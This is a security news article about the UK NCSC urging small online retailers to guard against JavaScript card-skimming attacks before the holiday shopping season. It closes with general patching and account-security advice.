Small businesses urged to protect their customers from card skimming
With Black Friday and Cyber Monday quickly approaching, the UK National Cyber Security Centre (NCSC) is urging small online shops to protect their customers from card skimming cyber criminals.
As part of NCSC’s Active Cyber Defence programme, the organization has already notified this year 4,151 small businesses that their sites have been compromised to steal customers’ payment details, and is now advising the rest to be on the alert.
Online shops and card skimming: The extent of the problem
Card-skimming attacks happen year-round, but regularly increase in the run up to the Christmas shopping season.
Crooks wielding these (usually JavaScript) skimmers want to make the most of the fact that more people are buying things online, but they also want to avoid their skimmers being detected before the massive shopping frenzy starts, so they often wait until the last possible moment to inject the malicious code into e-shops.
“We want small and medium-sized online retailers to know how to prevent their sites being exploited by opportunistic cyber criminals over the peak shopping period,” said Sarah Lyons, NCSC Deputy Director for Economy and Society.
“Falling victim to cyber crime could leave you and your customers out of pocket and cause reputational damage. It’s important to keep websites as secure as possible and I would urge all business owners to follow our guidance and make sure their software is up to date.”
The NCSC says that most of the card skimmer-saddled online shops they identified had been compromised via a known vulnerability in Magento, an open-source e-commerce platform. But even though vulnerable Magento installations used to be the most popular target for a while (it’s how the Magecart criminal groups got their name), attackers also target sites powered by popular web content management platforms such as Drupal, WooCommerce, WordPress, and others.
Advice for retailers
To minimize the possibility of their websites and online shops getting compromised, administrators should strive to regularly update their platform of choice and any add-on or extension they use, and to uninstall those that they don’t have a use for anymore. Administrator accounts should be secured with unique, complex passwords, and doubly secured with multi-factor authentication.
Retailers are advised to consult British Retail Consortium’s and NCSC’s Cyber Resilience Toolkit for Retail and use the offered advice to boost their cyber defences.
Malwarebytes has also recently offered (timely) advice on how to defend your website against card skimmers, and there are other helpful resources.